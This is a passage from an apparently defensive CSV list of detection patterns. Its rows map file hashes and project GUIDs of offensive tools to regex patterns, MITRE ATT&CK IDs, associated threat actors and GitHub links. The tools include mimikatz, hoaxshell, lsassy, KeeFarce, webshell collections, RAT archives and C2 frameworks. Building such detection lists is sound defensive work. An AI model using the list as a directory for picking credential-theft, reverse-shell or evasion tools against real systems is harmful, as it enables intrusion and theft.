and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","22337" "*168ca61eb4b45c7aa5b3b60df22a0d8122dee8d127a9b8a8e3ec5f427466edf9*",".{0,1000}168ca61eb4b45c7aa5b3b60df22a0d8122dee8d127a9b8a8e3ec5f427466edf9.{0,1000}","offensive_tool_keyword","RunasCs","RunasCs - Csharp and open version of windows builtin runas.exe","T1059.003 - T1059.001 - T1035","TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/RunasCs","1","0","#filehash","N/A","7","10","1159","141","2024-07-12T23:31:35Z","2019-08-08T20:18:18Z","22340" "*169158f7ab05b90fd880b4921decbbe9ff0b13d04592b4711cdcb07216f2d02a*",".{0,1000}169158f7ab05b90fd880b4921decbbe9ff0b13d04592b4711cdcb07216f2d02a.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. 
solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#filehash","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","22341" "*16985a42507acbba7f12b23aee803be8abbc0165958698cb9d2310b47bd84c49*",".{0,1000}16985a42507acbba7f12b23aee803be8abbc0165958698cb9d2310b47bd84c49.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22343" "*16a6b0fa183e54c07a78cdcea63df1d177aaafe8cf5737df9073e63fb03388a4*",".{0,1000}16a6b0fa183e54c07a78cdcea63df1d177aaafe8cf5737df9073e63fb03388a4.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","0","#filehash","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","22345" "*16ab1f4deaf16ea10b420b7f644da50978aefc3a6fff18e569f713689dbb050e*",".{0,1000}16ab1f4deaf16ea10b420b7f644da50978aefc3a6fff18e569f713689dbb050e.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22347" 
"*16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2*",".{0,1000}16b6ec4b80f404f4616e44d8c21978dcdad9f52c84d23ba27660ee8e00984ff2.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22349" "*16bb30509efac0ba13c42eade477ab4454c5951c1c20f7c991c62798284aa3b0*",".{0,1000}16bb30509efac0ba13c42eade477ab4454c5951c1c20f7c991c62798284aa3b0.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","#filehash","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","22350" "*16bef09e16119f1754a6b4283e93ff7a17cfdd7c043c3ff05a3d41f128ead52e*",".{0,1000}16bef09e16119f1754a6b4283e93ff7a17cfdd7c043c3ff05a3d41f128ead52e.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#filehash","N/A","8","10","11931","1725","2025-04-20T11:30:29Z","2020-11-13T16:35:20Z","22351" "*16c7ff461f2dbc21d705c9a458901ad48a5c830eb7e4e472b0df65634f850434*",".{0,1000}16c7ff461f2dbc21d705c9a458901ad48a5c830eb7e4e472b0df65634f850434.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","22353" "*16d582a5722d39a87d530e62c732864b8eeb9b039ca9b769888e53539b21371e*",".{0,1000}16d582a5722d39a87d530e62c732864b8eeb9b039ca9b769888e53539b21371e.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","22355" "*16d765e024adacabe84e9fd889030f5481546ef711bba0043e7e84eadd257d1a*",".{0,1000}16d765e024adacabe84e9fd889030f5481546ef711bba0043e7e84eadd257d1a.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","0","#filehash #linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","22356" "*16df73e36a53fb2a7c2a022c36d999a853c3e616ae4de7c3633a8d7769e81ec5*",".{0,1000}16df73e36a53fb2a7c2a022c36d999a853c3e616ae4de7c3633a8d7769e81ec5.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","#filehash","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","22358" "*16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218*",".{0,1000}16e1e886576d0c70af0f96e3ccedfd2e72b8b7640f817c08a82b95ff5d4b1218.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - 
TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22359" "*16e75a6be0f951622988cb5c7875151c9d4638e595a91c43be7a35d4d4f2cd50*",".{0,1000}16e75a6be0f951622988cb5c7875151c9d4638e595a91c43be7a35d4d4f2cd50.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22360" "*16e9f3c3f2a4264e3be9d2ddfe8d4ad409f4db17c077efd372389fbfe89f727b*",".{0,1000}16e9f3c3f2a4264e3be9d2ddfe8d4ad409f4db17c077efd372389fbfe89f727b.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","#filehash","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","22361" "*16ed8368d7cfd8a298d59ebb123c5724fa3c8f04097e6993aa06b32aab41b263*",".{0,1000}16ed8368d7cfd8a298d59ebb123c5724fa3c8f04097e6993aa06b32aab41b263.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","22364" "*16edb60cec97590d754e99e2eb719bbc990d71dcf1bda7c8eebf3b517574846d*",".{0,1000}16edb60cec97590d754e99e2eb719bbc990d71dcf1bda7c8eebf3b517574846d.{0,1000}","offensive_tool_keyword","WSAAcceptBackdoor","Winsock accept() Backdoor Implant","T1574.001 - T1059 - T1213 - T1105 - T1546","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/EgeBalci/WSAAcceptBackdoor","1","0","#filehash","N/A","10","2","112","23","2021-02-13T19:18:41Z","2021-02-13T15:59:01Z","22365" "*16ee86e4a45505a595d74043dabe9e22f0c8860f593c215ccf1c3eedf973e9dc*",".{0,1000}16ee86e4a45505a595d74043dabe9e22f0c8860f593c215ccf1c3eedf973e9dc.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","22366" "*16fe7dadefa2d2331f40b56595f695a5d4852c2bba909fd099d4cb4d3bcbd90b*",".{0,1000}16fe7dadefa2d2331f40b56595f695a5d4852c2bba909fd099d4cb4d3bcbd90b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","22367" "*16fef0c5d8dd0db6c928502541365471234fd1b5a8e7f8b2ea94c016d98afe5b*",".{0,1000}16fef0c5d8dd0db6c928502541365471234fd1b5a8e7f8b2ea94c016d98afe5b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - 
T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","22368" "*16fef3f7f220a758a571905bad6800a58c249af4d9a0ca47eb097c07e774250f*",".{0,1000}16fef3f7f220a758a571905bad6800a58c249af4d9a0ca47eb097c07e774250f.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","22369" "*1701b144ea17db4842862f5187b1ab99eb39df2a6adc7a0f4246dc40c5d63a05*",".{0,1000}1701b144ea17db4842862f5187b1ab99eb39df2a6adc7a0f4246dc40c5d63a05.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22370" "*170c9351717e67cda6f3cfa73196c32462e63c87a07336821668b38bd0e1cf01*",".{0,1000}170c9351717e67cda6f3cfa73196c32462e63c87a07336821668b38bd0e1cf01.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22371" 
"*1710e817fd36ff421632d2b1ad6335065d4323413965cb281a9fe9f363dd5258*",".{0,1000}1710e817fd36ff421632d2b1ad6335065d4323413965cb281a9fe9f363dd5258.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","22372" "*1713dc00a8573685838379ce680f6ee1ffbb4a3231ccc0ad4cf45fd9f3b3f837*",".{0,1000}1713dc00a8573685838379ce680f6ee1ffbb4a3231ccc0ad4cf45fd9f3b3f837.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","22373" "*17179c8931a5dc7a470485097f4a8f35fcf55bc4fa57d34c865ab76cd382ca74*",".{0,1000}17179c8931a5dc7a470485097f4a8f35fcf55bc4fa57d34c865ab76cd382ca74.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22374" "*171A9A71-EDEF-4891-9828-44434A00585E*",".{0,1000}171A9A71\-EDEF\-4891\-9828\-44434A00585E.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tool","https://github.com/daem0nc0re/VectorKernel/","1","0","#GUIDproject","N/A","10","4","367","60","2025-01-21T08:22:42Z","2023-11-23T12:36:31Z","22376" "*171b5c5e7631493dd1959913d21a9f94d75079507fa321f5fa61d37df07866b9*",".{0,1000}171b5c5e7631493dd1959913d21a9f94d75079507fa321f5fa61d37df07866b9.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100 - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","22377" "*171f2fb14b88f54e6a6c233a81ee5183ef8f65d614fac527f303bda60a8dc533*",".{0,1000}171f2fb14b88f54e6a6c233a81ee5183ef8f65d614fac527f303bda60a8dc533.{0,1000}","offensive_tool_keyword","PhpSploit","Full-featured C2 framework which silently persists on webserver via evil PHP oneliner","T1505.003 - T1505 - T1059 - T1219 - T1547","TA0003 - TA0011 - 
TA0005","N/A","N/A","C2","https://github.com/nil0x42/phpsploit","1","0","#filehash","N/A","10","10","2331","453","2024-05-06T13:49:14Z","2014-05-21T19:43:03Z","22378" "*1723ab71aa08741de80ab99fa08291b4066e632466c47ade2884b3739bf244b0*",".{0,1000}1723ab71aa08741de80ab99fa08291b4066e632466c47ade2884b3739bf244b0.{0,1000}","offensive_tool_keyword","SharpExfil","C# executables to extract information from target environment using OneDrive API.","T1567.002 - T1020 - T1071.001","TA0005 - TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/adm1nPanda/SharpExfil","1","0","#filehash","N/A","8","1","6","1","2020-07-02T14:48:55Z","2019-07-27T05:28:40Z","22379" "*17257046150e6cbdc59be7873210cc6e0399ba51a5da24114f3c147bdc4fdb4c*",".{0,1000}17257046150e6cbdc59be7873210cc6e0399ba51a5da24114f3c147bdc4fdb4c.{0,1000}","offensive_tool_keyword","nimproxydll","A Docker container for byt3bl33d3r/NimDllSideload - DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/cyllective/nimproxydll","1","0","#filehash","N/A","9","1","10","0","2024-05-26T17:34:01Z","2024-03-15T15:15:45Z","22380" "*1731851bbacba1bb0339f252f84a8f170532eb6f82e024e25071ef889e24d936*",".{0,1000}1731851bbacba1bb0339f252f84a8f170532eb6f82e024e25071ef889e24d936.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","22381" "*17332F12-D796-42D1-9A3E-460590A49382*",".{0,1000}17332F12\-D796\-42D1\-9A3E\-460590A49382.{0,1000}","offensive_tool_keyword","RedTeam_Tools_n_Stuff","Collection of self-made Red Team tools","T1070.004 - T1222 - T1070.003 - T1003.005 - T1057","TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation 
tool","https://github.com/samkenxstream/SAMkenXCCorePHdLAwiN8SoLr77","1","0","#GUIDproject","N/A","7","1","1","1","2023-10-13T06:31:42Z","2023-10-04T13:43:37Z","22382" "*17395a3b51f21d23c817cb84d56e915026fbf18fb34fc74c8b0377cd0e12ef94*",".{0,1000}17395a3b51f21d23c817cb84d56e915026fbf18fb34fc74c8b0377cd0e12ef94.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22383" "*173fddaeb3faa3256a8a6606775eb319ef5d70082f3b7c5ffab9d004b66b1c0d*",".{0,1000}173fddaeb3faa3256a8a6606775eb319ef5d70082f3b7c5ffab9d004b66b1c0d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","22384" "*174026948da91b966d499e4e3cf3ae425588fbcf792a76c5c18072df00112311*",".{0,1000}174026948da91b966d499e4e3cf3ae425588fbcf792a76c5c18072df00112311.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","22385" "*1753bd59904f52ea9be59524942fc98321472c6a91c7af8051ab397edee32e6a*",".{0,1000}1753bd59904f52ea9be59524942fc98321472c6a91c7af8051ab397edee32e6a.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","22388" "*1754f83853b70d8c2171902204aae31c6a26c0eb8f201092522c0a9d4e026f0b*",".{0,1000}1754f83853b70d8c2171902204aae31c6a26c0eb8f201092522c0a9d4e026f0b.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - 
T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","22389" "*17589EA6-FCC9-44BB-92AD-D5B3EEA6AF03*",".{0,1000}17589EA6\-FCC9\-44BB\-92AD\-D5B3EEA6AF03.{0,1000}","offensive_tool_keyword","KeeFarce","Extracts passwords from a KeePass 2.x database directly from memory","T1003 - T1055 - T1059","TA0006 ","N/A","N/A","Credential Access","https://github.com/denandz/KeeFarce","1","0","#GUIDproject","N/A","10","10","1009","132","2015-11-17T04:12:25Z","2015-10-27T05:29:04Z","22390" "*175c1d2aab217c0aba91cdc0366e8a81ed44e4fb8c9aa9109912ce488f364178*",".{0,1000}175c1d2aab217c0aba91cdc0366e8a81ed44e4fb8c9aa9109912ce488f364178.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential 
Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22391" "*175c1d2aab217c0aba91cdc0366e8a81ed44e4fb8c9aa9109912ce488f364178*",".{0,1000}175c1d2aab217c0aba91cdc0366e8a81ed44e4fb8c9aa9109912ce488f364178.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22392" "*176528ecba1bee91a831b36e3829803526e329f755af06e6ab14b57ac51df58c*",".{0,1000}176528ecba1bee91a831b36e3829803526e329f755af06e6ab14b57ac51df58c.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - 
APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","22394" "*176711b9ba9b2e01fbd5ad4ad2770d82985caffc02f70d4aa7585fe44508fbd3*",".{0,1000}176711b9ba9b2e01fbd5ad4ad2770d82985caffc02f70d4aa7585fe44508fbd3.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","22395" "*176fdbab2521f29e514c62db9038532ab5b591bf7a337d192e7710daf1c39de2*",".{0,1000}176fdbab2521f29e514c62db9038532ab5b591bf7a337d192e7710daf1c39de2.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. 
